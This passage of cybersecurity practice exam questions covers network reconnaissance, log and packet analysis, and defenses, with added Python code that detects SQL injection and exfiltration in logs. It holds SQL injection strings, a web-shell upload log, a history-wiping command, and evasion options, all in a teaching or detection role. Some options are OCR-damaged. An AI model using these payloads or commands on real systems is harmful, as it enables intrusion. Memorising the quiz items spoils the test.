2194  2.502267987  10.0.2.4   10.0.2.15    TCP       74      80 > 55558 [SYN, ACK] Seq=0 Ack=1 Win=5792 Len=0 MSS=1460 SACK_PERM=1 TSval=127194 TSecr=317
2195  2.502294637  10.0.2.15  10.0.2.4     TCP       66      55558 > 80 [ACK] Seq=1 Ack=1 Win=29312 Len=0 TSval=317474 TSecr=127194
2196  2.502356539  10.0.2.15  10.0.2.4     HTTP      499     GET /twiki/%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1

A. The blue team has succeeded.
B. The red team is violating the rules of engagement.
C. The red team has succeeded.
D. The blue team is violating the rules of engagement.
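The requests in question 84 and in the capture above are the same technique seen from two vantage points: a UNION SELECT appended to a parameter, with the column count walked upward one NULL at a time. The block below is an added example (mine, not the book's) of how a log reviewer can pick these out mechanically: it percent-decodes the request target repeatedly (so a double-encoded %2520 is still caught), then matches a short list of SQL injection shapes against the decoded text. The sample request lines are constructed from questions 83, 84 and 122 plus benign look-alikes; the signature list is illustrative, not a complete WAF ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed request lines modeled on the log entries in questions 83, 84 and
# 122, plus a benign query that merely contains the words "union" and "select"
# and a double-encoded payload. None of these are real traffic.
SAMPLE_REQUESTS = [
    "GET /query.php?searchterm=stuff&%20id=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1",
    "GET /twiki/%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1",
    "GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme=total HTTP/1.1",
    "GET /search?q=union+station+to+select+seats HTTP/1.1",
    "GET /item?id=1%2520UNION%2520SELECT%25201%2C2 HTTP/1.1",
]

SQLI_SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "select_from": re.compile(r"\bselect\b.+?\bfrom\b", re.I),
    "tautology": re.compile(r"['\"]\s*or\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I),
    "comment_tail": re.compile(r"(--|#|/\*)\s*$"),
    "stacked_query": re.compile(r";\s*(drop|insert|update|delete|exec)\b", re.I),
}


def fully_decode(target: str, max_rounds: int = 3) -> str:
    """Percent-decode until the text stops changing, so %2520 becomes a space."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def request_target(request_line: str) -> str:
    """Pull the target out of 'METHOD target HTTP/x.y'."""
    parts = request_line.split()
    return parts[1] if len(parts) >= 2 else request_line


def sqli_indicators(request_line: str) -> list:
    """Names of the signatures that match the decoded request target."""
    decoded = fully_decode(request_target(request_line))
    return [name for name, rx in SQLI_SIGNATURES.items() if rx.search(decoded)]


def is_sqli(request_line: str) -> bool:
    return bool(sqli_indicators(request_line))


APACHE_REQUEST = re.compile(r'"(?P<req>(?:GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH) [^"]*)"')


def scan_apache_log(lines):
    """Yield (client_ip, request_line, indicators) for suspicious combined-log entries."""
    for line in lines:
        m = APACHE_REQUEST.search(line)
        if not m:
            continue
        hits = sqli_indicators(m.group("req"))
        if hits:
            yield line.split()[0], m.group("req"), hits


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(sqli_indicators(req) or "clean", "<-", req[:70])
```

A 200 with an unusually large response size (9918 bytes for a search in question 84) or a 404 (the twiki probes above) tells you whether the payload was executed, not whether it was an attack; the decoded request is the evidence either way.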

123. Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with.
She discovers that a host with IP address 10.11.140.13 is running services on TCP ports
636 and 443. What services is that system most likely running?

A. LDAPS and HTTPS
B. FIPS and HTTPS
C. RDP and HTTPS
D. HTTP and Secure DNS


124. Lauren inputs the following command on a Linux system:

# echo 127.0.0.1 example.com >> /etc/hosts

What has she done?

A. She has added the system to the allowed hosts file.
B. She has routed traffic for the example.com domain to the local host.
C. She has routed local host traffic to example.com.
D. She has overwritten the hosts file and will have deleted all data except this entry.


125. While reviewing Apache logs, Cynthia notices the following log entries. What has
occurred?

10.0.1.1 - POST /wordpress/wp-content/r57.php?1 200
10.0.1.1 - GET /wordpress/wp-content/r57.php 200

A. A file was downloaded and verified.
B. A file was emailed.
C. A file was moved to the wp-content directory.
D. A file was uploaded and verified.


126. Rhonda has identified a privilege escalation flaw on the system she targeted in the first
phase of her penetration test and is now ready to take the next step. According to the
NIST 800-115 standard, what is step C that Rhonda needs to take, as shown in this
diagram?

[Diagram of the NIST SP 800-115 attack phase: Gaining Access -> Escalating Privileges -> C -> Install Additional Tools]

A. System browsing
B. Scanning
C. Rooting
D. Consolidation


127. While conducting a penetration test, Ben executes the following command:

ifconfig eth0 hw ether 08:00:27:06:d4

What network protection is Ben most likely attempting to avoid?

A. Port security
B. NAC
C. A firewall
D. An IPS


128. When Scott performs an nmap scan with the -T flag set to 5, what variable is he changing?

A. How fast the scan runs
B. The TCP timeout flag it will set
C. How many retries it will perform
D. How long the scan will take to start up


129. While conducting a port scan of a remote system, Henry discovers TCP port 1433 open.
What service can he typically expect to run on this port?

A. Oracle
B. VNC
C. IRC
D. Microsoft SQL
130. Every year, Alice downloads and reads a security industry published list of all the types
of attacks, compromises, and malware events that have occurred, that are becoming more
prevalent, and that are decreasing in occurrence. What type of analysis can she perform
using this information?

A. Anomaly
B. Trend
C. Heuristic
D. Availability


131. While application vulnerability scanning one of her target organization's web servers,
Andrea notices that the server's hostname is resolving to a cloudflare.com host. What
does Andrea know about her scan?

A. It is being treated like a DDoS attack.
B. It is scanning a CDN-hosted copy of the site.
C. It will not return useful information.
D. She cannot determine anything about the site based on this information.

132. While conducting active reconnaissance, Lauren discovers a web remote management
application that appears to allow Windows command-line access on a server. What
command can she run to quickly determine what user the service is running as?

A. username
B. showuser
C. whoami
D. cd c:\Users\%currentuser

133. While tracking a potential APT on her network, Cynthia discovers a network flow for her
company's central file server. What does this flow entry most likely show if 10.2.2.3 is not
a system on her network?

Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2017-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1G 1
2017-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:1151 8345101 514 M 1

A. A web browsing session
B. Data exfiltration
C. Data infiltration
D. A vulnerability scan
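Questions 111 and 133 show the two things flow records are best at revealing without any packet content: many single-packet flows from one host to the same port on consecutive addresses (a horizontal scan), and a long-lived session in which an internal host sends an order of magnitude more than it receives from an outside address (exfiltration, not browsing). The block below is an added example (mine, not the book's) that parses nfdump-style records like the ones in both questions, pairs each outbound flow with its reverse flow, and applies both rules. The records are constructed to mirror the two questions; the internal range (10.1.0.0/16), the duration formatting, and the byte and host thresholds are assumptions to be tuned for a real network.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumed internal address space; everything else is treated as external.
INTERNAL_NETS = [ip_network("10.1.0.0/16")]

# Constructed nfdump-style records modeled on questions 111 and 133, with a
# short ordinary HTTPS session added as a control. Durations are seconds.
SAMPLE_FLOWS = """\
Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
2017-07-11 04:59:32.934 0.000 TCP 10.1.1.1:34543->10.2.2.6:22 1 60 1
2017-07-11 04:59:39.730 0.000 TCP 10.1.1.1:34544->10.2.2.7:22 1 60 1
2017-07-11 04:59:46.166 0.000 TCP 10.1.1.1:34545->10.2.2.8:22 1 60 1
2017-07-11 04:59:52.934 0.000 TCP 10.1.1.1:34546->10.2.2.9:22 1 60 1
2017-07-11 05:00:06.710 0.000 TCP 10.1.1.1:34547->10.2.2.10:22 1 60 1
2017-07-11 05:00:46.160 0.000 TCP 10.1.1.1:34548->10.2.2.11:22 1 60 1
2017-07-11 05:01:32.834 0.000 TCP 10.1.1.1:34549->10.2.2.12:22 1 60 1
2017-07-11 05:01:39.430 0.000 TCP 10.1.1.1:34550->10.2.2.13:22 1 60 1
2017-07-11 05:01:46.676 0.000 TCP 10.1.1.1:34551->10.2.2.14:22 1 60 1
2017-07-11 13:06:46.343 21601.804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1G 1
2017-07-11 13:06:46.551 21601.804 TCP 10.2.2.3:443->10.1.1.1:1151 8345101 514 M 1
2017-07-11 13:10:02.120 12.410 TCP 10.1.1.7:50211->10.2.9.9:443 120 18 K 1
2017-07-11 13:10:02.130 12.410 TCP 10.2.9.9:443->10.1.1.7:50211 240 2.3 M 1
"""

FLOW_RE = re.compile(
    r"^(?P<date>\S+)\s+(?P<time>\S+)\s+(?P<dur>[\d.]+)\s+(?P<proto>\w+)\s+"
    r"(?P<sip>[\d.]+):(?P<sport>\d+)->(?P<dip>[\d.]+):(?P<dport>\d+)\s+"
    r"(?P<pkts>\d+)\s+(?P<bytes>[\d.]+)\s*(?P<unit>[KMG])?\s+(?P<flows>\d+)\s*$"
)
UNITS = {None: 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}


def parse_flows(text):
    """Parse nfdump-style lines; header and malformed lines are skipped."""
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.match(line.strip())
        if not m:
            continue
        flows.append({
            "start": f"{m['date']} {m['time']}", "dur": float(m["dur"]), "proto": m["proto"],
            "sip": m["sip"], "sport": int(m["sport"]), "dip": m["dip"], "dport": int(m["dport"]),
            "pkts": int(m["pkts"]), "bytes": int(float(m["bytes"]) * UNITS[m["unit"]]),
        })
    return flows


def is_internal(ip):
    return any(ip_address(ip) in net for net in INTERNAL_NETS)


def find_exfiltration(flows, min_out_bytes=1 << 30, min_ratio=5.0):
    """Pair each outbound flow with its reverse flow and flag sessions where an
    internal host pushes far more to an external host than it gets back."""
    by_tuple = {(f["sip"], f["sport"], f["dip"], f["dport"]): f for f in flows}
    findings = []
    for (sip, sport, dip, dport), f in by_tuple.items():
        if not (is_internal(sip) and not is_internal(dip)):
            continue
        reverse = by_tuple.get((dip, dport, sip, sport))
        in_bytes = reverse["bytes"] if reverse else 0
        ratio = f["bytes"] / in_bytes if in_bytes else float("inf")
        if f["bytes"] >= min_out_bytes and ratio >= min_ratio:
            findings.append({"src": sip, "dst": f"{dip}:{dport}", "out_bytes": f["bytes"],
                             "in_bytes": in_bytes, "ratio": round(ratio, 1), "duration_s": f["dur"]})
    return findings


def find_horizontal_scans(flows, min_hosts=5):
    """Single-packet flows from one source to the same port on many hosts."""
    targets = defaultdict(set)
    for f in flows:
        if f["pkts"] == 1:
            targets[(f["sip"], f["dport"])].add(f["dip"])
    return [{"src": s, "dport": p, "hosts": len(h)}
            for (s, p), h in targets.items() if len(h) >= min_hosts]


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    print(find_horizontal_scans(flows))
    print(find_exfiltration(flows))
```

The byte ratio is what distinguishes the file-server flow from ordinary browsing: a client fetching pages receives far more than it sends (the control session above is 18 K out against 2.3 M in), whereas the flagged session pushes 9.1 G out over six hours and pulls back only 514 M.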

134. Chris wants to prevent users from running a popular game on Windows workstations he is
responsible for. How can Chris accomplish this for Windows 10 Pro workstations?

A. Using application whitelisting to prevent all unallowed programs from running
B. Using Windows Defender and adding the game to the blacklist file
C. By listing it in the Blocked Programs list via secpol.msc
D. You cannot blacklist applications in Windows 10 without a third-party application.


135. After a series of compromised accounts led to her domain being blacklisted, Lauren has
been asked to restore her company's email as quickly as possible. Which of the following
options is not a valid way to allow her company to send email successfully?

A. Migrate her company's SMTP servers to new IP addresses.
B. Migrate to a cloud email hosting provider.
C. Change SMTP headers to prevent blacklisting.
D. Work with the blacklisting organizations to get removed from the list.

136. Part of Tracy's penetration testing assignment is to evaluate the WPA2 Enterprise protected
wireless networks of her target organization. What major differences exist between
reconnaissance of a wired network versus a wireless network?

A. Encryption and physical accessibility
B. Network access control and encryption
C. Port security and physical accessibility
D. Authentication and encryption

137. Ian's company has an internal policy requiring that they perform regular port scans of all
of their servers. Ian has been part of a recent effort to move his organization's servers to an
infrastructure as a service provider. What change will Ian most likely need to make to his
scanning efforts?

A. Change scanning software.
B. Follow the service provider's scan policies.
C. Sign a security contract with the provider.
D. Discontinue port scanning.

During a regularly scheduled PCI compliance scan, Fred has discovered port 3389 open on 


one of the point-of-sale terminals that he is responsible for managing. What service should 
he expect to find enabled on the system? 


A. MySQL 
B. RDP 

C. TOR 

D. Jabber 


Cynthia knows that the organization she is scanning runs services on alternate ports to 
attempt to reduce scans of default ports. As part of her intelligence-gathering process, she 
discovers services running on ports 8080 and 8443. What services are most likely running 
on these ports? 


A. Botnet C&C 

B. Nginx 

C. Microsoft SQL Server instances 
D 


Web servers 
Chapter 1 = Domain 1: Threat Management 

140. Lauren wants to identify all the printers on the subnets she is scanning with nmap. Which 
of the following nmap commands will not provide her with a list of likely printers? 

A. nmap -sS -p 9100,515,631 10.0.10.15/22 -oX printers.txt 
B. nmap -O 10.0.10.15/22 -oG - | grep printer >> printers.txt 
C. nmap -sU -p 9100,515,631 10.0.10.15/22 -oX printers.txt 
D. nmap -sS -O 10.0.10.15/22 -oG | grep >> printers.txt 

141. Chris knows that systems have connected to a remote host on TCP ports 1433 and 1434. If 
he has no other data, what should his best guess be about what the host is? 

A. A print server 
B. A Microsoft SQL server 
C. A MySQL server 
D. A secure web server running on an alternate port 

142. What services will the following nmap scan test for? 

nmap -sV -p 22,25,53,389 192.168.2.50/27 

A. telnet, SMTP, DHCP, MS-SQL 
B. ssh, SMTP, DNS, LDAP 
C. telnet, SNMP, DNS, LDAP 
D. ssh, SNMP, DNS, RDP 

143. While investigating a compromise, Glenn encounters evidence that a user account has been 
added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and 
sees the following output. What has occurred? 

> root: $6$XHxtN5iBS5WOyg3egGfzr9QHPLo. 7ZOXIQIZEW6Q3/ 
K711pxG7ue04Cme Lkj C51SndpOcQLxTHmw4 /AKKsKew4f3cb/.BK8/:16828:0:99999:7::: 


> daemon:*:16820:0:99999:7::: 
bin:*:16820:0:99999:7::: 
sys:*:16820:0:99999:7::: 
sync:*:16820:0:99999:7::: 
games:*:16820:0:99999:7::: 
man:*:16820:0:99999:7::: 
lp:*:16820:0:99999:7::: 
mail:*:16820:0:99999:7::: 
news:*:16820:0:99999:7::: 
uucp:*:16820:0:99999:7::: 
proxy:*:16820:0:99999:7::: 
www-data:*:16820:0:99999:7::: 
backup:*:16820:0:99999:7::: 
list:*:16820:0:99999:7::: 
irc:*:16820:0:99999:7::: 

A. The root account has been compromised. 
B. An account named daemon has been added. 
C. The shadow password file has been modified. 
D. /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison. 


144. While conducting a topology scan of a remote web server, Susan notes that the IP 
addresses returned for the same DNS entry change over time. What has she likely 
encountered? 


A. A route change 
B. Fast flux DNS 
C. A load balancer 
D. An IP mismatch 


145. Attackers have been attempting to log into Alaina’s Cisco routers, causing thousands of log 
entries, and she is worried they may eventually succeed. Which of the following options 
should she recommend to resolve this issue? 


A. Prevent console login via ssh. 
B. Implement a login-block feature with back-off settings. 
C. Move the administrative interface to a protected network. 
D. Disable console access entirely. 
146. Ron is reviewing his team’s work as part of a reconnaissance effort and is checking 
Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue 
should he identify with their scan based on the capture shown here? 

[Packet capture: columns Time, Destination, Protocol, Length, Info; a burst of packets 
with timestamps between 0.100 and 0.121 seconds, each shown with Len=0] 

A. The host was not up. 
B. Not all ports were scanned. 
C. The scan scanned only UDP ports. 
D. The scan was not run as root. 


147. John needs to protect his organization’s authentication system against brute-force attacks. 
Which of the following control pairs are best suited to preventing a brute-force attack 
from succeeding if ease of use and maintenance is also important? 

A. Passwords and PINs 
B. Passwords and biometrics 
C. Passwords and token-based authentication 
D. Token-based authentication and biometrics 

148. While reviewing the command history for an administrative user, Chris discovers a 
suspicious command that was captured, shown here: 

ln /dev/null ~/.bash_history 

What action was this user attempting to perform? 

A. Enabling the bash history 
B. Appending the contents of /dev/null to the bash history 
C. Logging all shell commands to /dev/null 
D. Allowing remote access from the null shell 

149. While attempting to stop a rogue service, Monica issues the following Linux command on 
an Ubuntu system using upstart: 

service rogueservice stop 

After a reboot, she discovers the service running again. What happened, and what does 
she need to do to prevent this? 

A. The service restarted at reboot; she needs to include the "-p", or permanent flag. 
B. The service restarted itself; she needs to delete the binary associated with the service. 
C. The service restarted at reboot; she should add an .override file to stop the service 
from starting. 
D. A malicious user restarted the service; she needs to ensure users cannot restart 
services. 

150. Lucca wants to validate DNS responses to ensure that they are from authoritative DNS 
servers. What technology can he use to do this? 

A. DNSSEC 
B. DNSCrypt 
C. DNShield 
D. DNS is an open protocol and does not support secure validation. 

151. Nathan has been asked to monitor and manage the environment in which a cybersecurity 
exercise is conducted. What team is he on? 

A. Red team 
B. White team 
C. Blue team 
D. Black team 

152. Allan’s nmap scan includes a line that starts with cpe:/o. What type of information should 
he expect to gather from the entry? 

A. Common privilege escalation 
B. Operating system 
C. Certificate performance evaluation 
D. Hardware identification 

153. Which of the following items is not typically included in the rules of engagement for a 
penetration test? 

A. Timing 
B. Authorization 
C. Scope 
D. Authorized tools 

154. Isaac wants to prevent hosts from connecting to known malware distribution domains. 
What type of solution can he use to do this without deploying endpoint protection 
software or an IPS? 

A. Route poisoning 
B. Anti-malware router filters 
C. Subdomain whitelisting 
D. DNS blackholing 

155. While scanning a network, Frank discovers a host running a service on TCP ports 1812 
and 1813. What type of server has Frank most likely discovered? 

A. RADIUS 
B. VNC 
C. Kerberos 
D. Postgres 
156. While reviewing output from netstat, John sees the following output. What should his 
next action be? 

[minesweeper.exe] 
TCP 127.0.0.1:54562 dynamo:0 LISTENING 
[minesweeper.exe] 
TCP 192.168.1.100 151.101.2.69:https ESTABLISHED 

A. Capture traffic to 151.101.2.69 using Wireshark. 
B. Initiate the organization’s incident response plan. 
C. Check to see whether 151.101.2.69 is a valid Microsoft address. 
D. Ignore it, because this is a false positive. 


157. Shane wants to conduct an nmap scan of a firewalled subnet. Which of the following is not 
an nmap firewall evasion technique he could use? 

A. Fragmenting packets 
B. Changing packet header flags 
C. Spoofing the source IP 
D. Appending random data 

158. Alex is observing a penetration tester who has gained access to a Windows domain 
controller. The penetration tester runs a program called fgdump and gathers information from 
the system. What type of information has the penetration tester targeted? 

A. File and group information 
B. Password and usernames 
C. Active Directory full GPO lists 
D. Nothing, because FGDump is a Linux tool. 

159. Which of the following commands will provide Ben with the most information about a host? 

A. dig -x [ip address] 
B. host [ip address] 
C. nslookup [ip address] 
D. zonet [ip address] 

160. Selah suspects that the Linux system she has just logged into may be Trojaned and wants 
to check where the bash shell she is running is being executed from. What command 
should she run to determine this? 

A. where bash 
B. ls -l bash 
C. which bash 
D. printenv bash 
161. Adam needs to provide ssh access to systems behind his data center firewall. If Adam’s 
organization uses the system architecture shown here, what is the system at point A called? 

[Diagram: firewall or unified security device; the system at point A; data center servers] 

A. A firewall-hopper 
B. An isolated system 
C. A moat-protected host 
D. A jump box 
162. Angela wants to block traffic sent to a suspected malicious host. What iptables rule 
entry can she use to block traffic to a host with IP address 10.24.31.11? 
A. iptables -A OUTPUT -d 10.24.31.11 -j DROP 
B. iptables -A INPUT -d 10.24.31.11 -j ADD 
C. iptables -block -host 10.24.31.11 -j DROP 
D. iptables -block -ip 10.24.31.11 -j ADD 


163. Fred’s reconnaissance of an organization includes a search of the Censys network search 
engine. There, he discovers multiple certificates with validity dates as shown here: 


Validity 
2016-07-07 00:00:00 to 2017-08-11 23:59:59 (400 days, 23:59:59) 
2016-07-08 00:00:00 to 2017-08-12 23:59:59 (400 days, 23:59:59) 
2017-07-11 00:00:00 to 2018-08-15 23:59:59 (400 days, 23:59:59) 

What should Fred record in his reconnaissance notes? 

A. The certificates expired as expected, showing proper business practice. 
B. The certificates were expired by the CA, possibly due to nonpayment. 
C. The system that hosts the certificates may have been compromised. 
D. The CA may have been compromised, leading to certificate expiration. 
164. After receiving a penetration test report, Rick has decided to implement anti-harvesting 
techniques for his organization’s DNS. Which of the following sets of techniques is best 
suited to preventing bulk and automated information gathering? 

A. CAPTCHA and proxy services 
B. Rate limiting and CAPTCHA 
C. Not publishing TLD zone files and blacklisting 
D. CAPTCHA and blacklisting 

165. When Casey scanned a network host, she received the results shown here. What does she 
know based on the scan results? 

PORT STATE SERVICE VERSION 
2000/tcp open cisco-sccp? 
3000/tcp open http Apache httpd 2.2.3 ((CentOS)) 
6789/tcp open ibm-db2-admin? 

A. The device is a Cisco device. 
B. The device is running CentOS. 
C. The device was built by IBM. 
D. None of the above 

166. What is a document that lists sensitive data-handling rules, contact information, black-box 
testing, and status meeting schedules called during a penetration test? 

A. The “get out of jail free” card 
B. The rules of engagement 
C. Executive sign-off 
D. A penetration test standard 

167. Fred conducts an SNMP sweep of a target organization and receives no-response replies 
from multiple addresses that he believes belong to active hosts. What does this mean? 

A. The machines are unreachable. 
B. The machines are not running SNMP servers. 
C. The community string he used is invalid. 
D. Any or all of the above may be true. 

168. Angela wants to gather detailed information about the hosts on a network passively. If she 
has access to a Wireshark pcap file from the network, which of the following tools can she 
use to provide automated analysis of the file? 

A. ettercap 
B. Network Miner 
C. Sharkbait 
D. dradis 
169. Rick’s security research company wants to gather data about current attacks and sets up a 
number of intentionally vulnerable systems that allow his team to log and analyze exploits 
and attack tools. What type of environment has Rick set up? 

A. A tarpit 
B. A honeypot 
C. A honeynet 
D. A blackhole 

170. While performing reconnaissance of an organization’s network, Angela discovers that 
web.organization.com, www.organization.com, and documents.organization.com 
all point to the same host. What type of DNS record allows this? 

A. A CNAME 
B. An MX record 
C. An SPF record 
D. An SOA record 

171. Susan wants to prevent attackers from running specific files and also wants to lock down 
other parts of the Windows operating system to limit the impact of attackers who have 
access to workstations she is responsible for. If she wants to do this on Windows 10 
workstations, what tool should she use? 

A. Secpol.msc 
B. FileVault 
C. AppLocker 


172. While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers 
the following log entries: 


Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; 
logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root 


Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 > 3 


Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 
port 38463 ssh2 


Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts 
exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth] 


Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication 
failures [preauth] 

Which of the following has not occurred? 

A. A user has attempted to re-authenticate too many times. 


B. PAM is configured for three retries and will reject any additional retries in the same 
session. 


C. Fail2ban has blocked the ssh login attempts. 


D. Root is attempting to log in via ssh from the local host. 
173. Chris operates the point-of-sale network for a company that accepts credit cards and is 
thus required to be compliant with PCI-DSS. During his regular assessment of the point-
of-sale terminals, he discovers that a recent Windows operating system vulnerability exists 
on all of them. Since they are all embedded systems that require a manufacturer update, he 
knows that he cannot install the available patch. What is Chris’s best option to stay 
compliant with PCI-DSS and protect his vulnerable systems? 

A. Replace the Windows embedded point-of-sale terminals with standard Windows 
systems. 
B. Build a custom operating system image that includes the patch. 
C. Identify, implement, and document compensating controls. 
D. Remove the POS terminals from the network until the vendor releases a patch. 

174. Senior management in Adam’s company recently read a number of articles about massive 
ransomware attacks that successfully targeted organizations like the one that Adam is a 
part of. Adam’s organization already uses layered security solutions including a border 
IPS, firewalls between network zones, local host firewalls, antivirus software, and a 
configuration management system that applies recommended operating system best practice 
settings to their workstations. What should Adam recommend to minimize the impact of a 
similar ransomware outbreak at his organization? 

A. Honeypots 
B. Backups 
C. Anti-malware software 
D. A next-generation firewall appliance 

175. Which of the following tools is not typically associated with the reconnaissance phase of a 
penetration test? 

A. Metasploit 
B. nmap 
C. Nessus 
D. Maltego 

176. What occurs when Alex uses the following command to perform an nmap scan of a 
network? 

nmap -sP 192.168.2.0/24 

A. A secure port scan of all hosts in the 192.168.0.0 to 192.168.2.255 network range 
B. A scan of all hosts that respond to ping in the 192.168.0.0 to 192.168.255.255 
network range 
C. A scan of all hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 network 
range 
D. A SYN-based port scan of all hosts in the 192.168.2.0 to 192.168.2.255 network 
range 
177. As part of her malware analysis process, Kara builds a diagram of the components of the 
suspected malware package. At each stage, she unpacks, de-obfuscates, and identifies each 
subcomponent, adding it to her diagram. What is this process known as? 

[Diagram: Suspected Malware; Packer Identified; File Unpacked; Base64 Decoded; System 
Components and Resources: config.ini, suspect.dll, screen.bin, core.cab] 

A. Decomposition 
B. Disassembly 
C. Reverse archiving 
D. Fingerprinting 


178. Aubrey is reviewing her firewall logs for signs of attacks in her role as a blue team member 
during a penetration test. Which of the following types of attack is she least likely to be 
able to identify using a stateful packet inspection firewall? 


A. A SYN flood 
B. A SQL injection attack 
C. A port scan 
D. A DDoS attack 


179. Geoff’s remote scans of a target organization’s class C network block using nmap 
(nmap -sS 10.0.10.1/24) show only a single web server. If Geoff needs to gather addi- 
tional reconnaissance information about the organization’s network, which of the follow- 
ing scanning techniques is most likely to provide additional detail? 


A. Use a UDP scan. 
B. Perform a scan from on-site. 
C. Scan using the -p 1-65535 flag. 
D. Use nmap’s IPS evasion techniques. 
180. During her normal daily review process, Jennifer detects an external system that is 
systematically conducting traceroute operations to each of the systems and devices in her 
network. What activity is most likely occurring? 

A. A regularly scheduled network scan from her company’s ISP 
B. A vulnerability scan 
C. Network topology reconnaissance 
D. Router probes to determine the best routes via BGP discovery 

181. Why does the U.S. government require Trusted Foundry and related requirements for 
technology? 

A. To control prices 
B. To ensure standards compatibility 
C. To prevent hardware-level compromise of devices 
D. To ensure U.S.-based supplier viability for strategic components 


182. As part of an externally accessible information review by their security team, Bob and Lisa 
receive information that the security team gathered including the following entry: 

Query Results: 
Router: Ashburn, VA - US 
Command: show bgp ipv4 unicast 10.81.254.195 
BGP routing table entry for 10.64.0.0/11 
Versions: 
Process bRIB/RIB SendTblVer 
Speaker 287479994 287479994 
Last Modified: Feb 22 09:16:16.154 for 8w0d 
Paths: (13 available, best #13) 
Advertised to update-groups (with more than one peer): 
0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45 
Advertised to peers (in unique update groups): 
10.250.51.162 
Path #1: Received by speaker 0 
Not advertised to any peer 
1922 
10.242.151.65 (metric 6710) from (129.250.0.162) 
Origin IGP, metric 4294967294, localpref 98, valid, confed-internal 
Received Path ID 0, Local Path ID 0, version 0 
Community: 2914:390 2914:1006 2914:2000 2914:3000 65504:7922 
Originator: 10.250.0.162, Cluster list: 10.250.0.9 

Path #13: Received by speaker 0 
Advertised to update-groups (with more than one peer): 
0.1 0.14 0.29 0.30 0.33 0.34 0.36 0.45 
Advertised to peers (in unique update groups): 
10.250.51.162 
7922 

What type of tool could they use to gather this publicly available information about their 
systems in the future? 

A. nmap 
B. A BGP looking glass 
C. A BGP reflector 
D. A route/path assimilator 
183. A system that Jeff is responsible for has been experiencing consistent denial-of-service 
attacks using a version of the Low Orbit Ion Cannon (LOIC) that leverages personal 
computers in a concerted attack by sending large amounts of traffic from each system to flood 
a server, thus making it unable to respond to legitimate requests. What type of firewall 
rule should Jeff use to limit the impact of a tool like this if bandwidth consumption from 
the attack itself is not the root problem? 

A. IP-based blacklisting 
B. Drop all SYN packets. 
C. Use a connection rate or volume-limiting filter per IP. 
D. Use a route-blocking filter that analyzes common LOIC routes. 

184. Chris wants to limit the ability of attackers to conduct passive fingerprinting exercises on 
his network. Which of the following practices will help to mitigate this risk? 

A. Implement an IPS. 
B. Implement a firewall. 
C. Disable promiscuous mode for NICs. 
D. Enable promiscuous mode for NICs. 

185. Geoff wants to gather a list of all Windows services and their current state using a 
command-line tool. What tool can he use to gather this information for later processing? 

A. svcctl -l 
B. service list 
C. service -l 
D. sc query 

186. While reviewing Shodan scan data for his organization, Adam finds the following 
information. What type of system has he discovered? 

BAS SCADA 
TDC Group 
Denmark, Aarhus 
Details 

HTTP/1.1 200 OK 
Server: BAS SCADA Service HTTPserv:22001 
Date: Mon, 07 Aug 2017 13:35:26 GMT 
Cache-Control: no-cache, max-age=0, must-revalidate 
Content-Type: text/html 
Content-Length: 879 
Last-Modified: Tue, 17 Feb 2015 18:48:10 GMT 

A. A botnet administration system 
B. A control and data acquisition system 
C. A noncaching web server 
D. A NAS 


Use the following scenario and image to answer the following three questions: 


While reviewing a system she is responsible for, Amanda notices that the system is per- 
forming poorly and runs htop to see a graphical representation of system resource usage. 
She sees the following information: 


1 [||||||||||||||||||||||||||||||||||100.0%] Tasks: 104, 254 thr; 3 running 
2 [||||||||||||||||||||||||||||||||||100.0%] Load average: 1.65 0.76 0.33 
Mem[||||||||||||||||||||||1.22G/1.96G] Uptime: 02:16:45 
Swp[|1.80M/1.26G] 

PID USER PRI NI VIRT RES SHR S CPU% MEM% TIME+ Command 
R 98.0 0.8 1:15. stress --vm-bytes 
1197 root 20 0 2293M 399M 76680 S 1.3 19.9 2:10.43 /usr/bin/gnome-sh 
1125 root 18 -2 122M 2960 2524 S 1.3 0.1 0:13.88 /usr/bin/VBoxClie 
1025 root 20 0 455M 130M 28964 S 0.7 6.5 0:31.57 /usr/lib/xorg/Xor 
1202 root 20 0 2293M 399M 76680 S 0.7 19.9 0:32.64 /usr/bin/gnome-sh 
1449 root 20 0 494M 40636 26516 S 0.0 2.0 0:03.69 /usr/lib/gnome-te 
1280 root 20 0 740M 38212 27624 S 0.0 1.9 0:00.94 nautilus -n 
1120 root 20 0 122M 2960 2524 S 0.0 0.1 0:13.88 /usr/bin/VBoxClie 
1201 root 20 0 2293M 399M 76680 S 0.0 19.9 0:32.44 /usr/bin/gnome-sh 
